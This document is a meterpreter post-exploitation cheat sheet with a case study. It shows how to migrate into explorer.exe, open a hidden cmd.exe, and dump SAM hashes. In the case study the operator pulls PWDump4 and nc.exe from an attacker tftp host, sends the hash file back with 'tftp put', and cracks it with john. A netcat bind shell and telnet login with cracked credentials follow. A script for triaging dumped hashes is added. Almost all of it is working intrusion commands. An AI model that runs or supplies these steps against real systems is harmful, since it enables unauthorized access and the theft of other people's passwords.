These examples assume that you have exploited a box and have a meterpreter session running.
Migrate to another process:
After running a browser based exploit, IE may crash, or the user may force quit it from Task Manager. Either way
the meterpreter session dies with that process. To stay connected to the victim, migrate into a process that will
outlive the browser (explorer.exe is a common choice) as soon as the session comes up.
ps
migrate 100
(100 here is the PID of the target process as shown in the ps listing, not a fixed value)
getpid
(getpid confirms the session now lives in the new PID)
Kill a process:
ps
kill PID
Download a file:
download <file in current directory of remote source> <local destination>
download test.txt /root/Desktop/
Upload a file:
upload <local source> <remote destination>
upload /root/Desktop/test.txt C:\\
(backslashes are escape characters in the meterpreter console, so double them or use forward slashes in Windows paths)
Execute a file:
execute -c -f C:/nc.exe
(-f names the program to run, -c channelizes its input and output so you can talk to it from meterpreter)
Get a command prompt:
execute -c -f cmd.exe -H
interact 1
(-H hides the window from the logged-in user; execute prints the channel number it created, and that is the number
you pass to interact, 1 here is just an example)
Dump the SAM file (local account password hashes):
getuid
use priv
hashdump
(hashdump needs SYSTEM privileges; if getuid does not report NT AUTHORITY\SYSTEM, run getsystem first. use priv loads
the priv extension on older Metasploit releases, current versions load it automatically.)
-
Case study
(meterpreter)
help
use -m Process
help
execute -c -f cmd
interact 1
C:\WINNT\system32>
ipconfig
hostname
whoami
(open 2nd shell on BackTrack)
start a tftp server with /tmp as its root, since that is where the files below are staged
cd /pentest/windows-binaries/tools/
cp nc.exe /tmp
cp PWDump4.exe /tmp
cp PWDump4.dll /tmp
cd /pentest/password/dictionaries/
gunzip -c wordlist.txt.Z > /tmp/wordlist.txt
(meterpreter, inside the cmd.exe channel opened with interact)
tftp -i attackIP get PWDump4.exe
tftp -i attackIP get PWDump4.dll
tftp -i attackIP get nc.exe
pwdump4 /l /o:dump.txt
tftp -i attackIP put dump.txt
(-i selects binary transfer mode; without it the .exe and .dll arrive corrupted. pwdump4 writes the hashes to
dump.txt via /o:, which is then pushed back to the attack box over the same tftp server.)
(BackTrack)
cd /tmp
cat dump.txt
john -w:wordlist.txt dump.txt
john --show dump.txt
john -w:wordlist.txt -f:NT dump.txt
(john defaults to the LM hashes, which crack quickly but only yield the password in uppercase; the second run against
the NT hashes (-f:NT, long form --format=NT) recovers the real case. Accounts whose LM field is
aad3b435b51404eeaad3b435b51404ee have no LM hash stored, so only the NT run can crack them.)
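The john steps above go faster if you look at dump.txt before cracking. The script below is an added example, not part of the original notes nor of pwdump or john: it builds a constructed dump.txt in pwdump format (user:rid:LM:NT:::), flags accounts whose NT hash is the empty-password value, finds which accounts still carry a crackable LM hash, and splits the file so each john run only sees hashes it can use. The hash values are constructed test data (the published LM/NT hashes of the string "password", plus one arbitrary placeholder), and the wordlist path it prints is an assumption.

```shell
#!/bin/sh
# Added example (not from the original notes): triage a pwdump-format dump.txt
# before feeding it to john. One account per line: user:rid:LMhash:NThash:::
# All dump contents below are constructed for this example; the "empty" marker
# hashes are the well-known public constants, the Administrator hashes are the
# published LM/NT hashes of "password", and the svc NT hash is an arbitrary
# placeholder. None come from a real host.

# LM field meaning "no LM hash stored" (LM disabled or password longer than 14 chars).
LM_EMPTY=aad3b435b51404eeaad3b435b51404ee
# NT hash of the empty string: the account has no password at all.
NT_EMPTY=31d6cfe0d16ae931b73c59d7e0c089c0

# Write a constructed dump.txt to the path given as $1.
make_sample_dump() {
    cat > "$1" <<EOF
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:${LM_EMPTY}:${NT_EMPTY}:::
svc:1001:${LM_EMPTY}:0123456789abcdef0123456789abcdef:::
EOF
}

# Accounts with an empty NT hash: log in with a blank password, no cracking needed.
empty_password_accounts() {
    awk -F: -v e="$NT_EMPTY" 'NF >= 4 && tolower($4) == e { print $1 }' "$1"
}

# Accounts that still have an LM hash: crack these first, LM is the weak half.
lm_crackable() {
    awk -F: -v e="$LM_EMPTY" 'NF >= 4 && tolower($3) != e { print $1 }' "$1"
}

# Split the dump into lm.txt (lines with a real LM hash) and nt.txt (lines with
# a real NT hash) under directory $2, so each john run only sees usable hashes.
split_for_john() {
    : > "$2/lm.txt"
    : > "$2/nt.txt"
    awk -F: -v lm="$LM_EMPTY" -v nt="$NT_EMPTY" -v out="$2" '
        NF >= 4 && tolower($3) != lm { print > (out "/lm.txt") }
        NF >= 4 && tolower($4) != nt { print > (out "/nt.txt") }
    ' "$1"
}

# Print the john invocations for the split files in $1 with wordlist $2
# (run them by hand once john is installed; --format=NT is the long form of -f:NT).
crack_plan() {
    echo "john --format=LM -w:$2 $1/lm.txt"
    echo "john --format=NT -w:$2 $1/nt.txt"
}

# Stand-alone run: stage the sample dump in a temp dir and report on it.
demo() {
    dir=$(mktemp -d)
    make_sample_dump "$dir/dump.txt"
    echo "no password set: $(empty_password_accounts "$dir/dump.txt")"
    echo "LM hash present: $(lm_crackable "$dir/dump.txt")"
    split_for_john "$dir/dump.txt" "$dir"
    crack_plan "$dir" /tmp/wordlist.txt   # wordlist path is an assumption
    rm -rf "$dir"
}

demo
```

Run it with sh to see the triage on the sample; on a real engagement call the same functions on the dump.txt you pulled back over tftp instead of the constructed one.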
(meterpreter, same cmd.exe channel on the target)
nc -lvp 4444 -e cmd.exe
(this is a bind shell: nc listens on the target's port 4444 and hands cmd.exe to whoever connects)
(BackTrack)
telnet targetIP 4444
C:\WINNT\system32>
ipconfig
whoami
exit
telnet targetIP
login with a cracked user account and password (this needs the telnet service running on the target)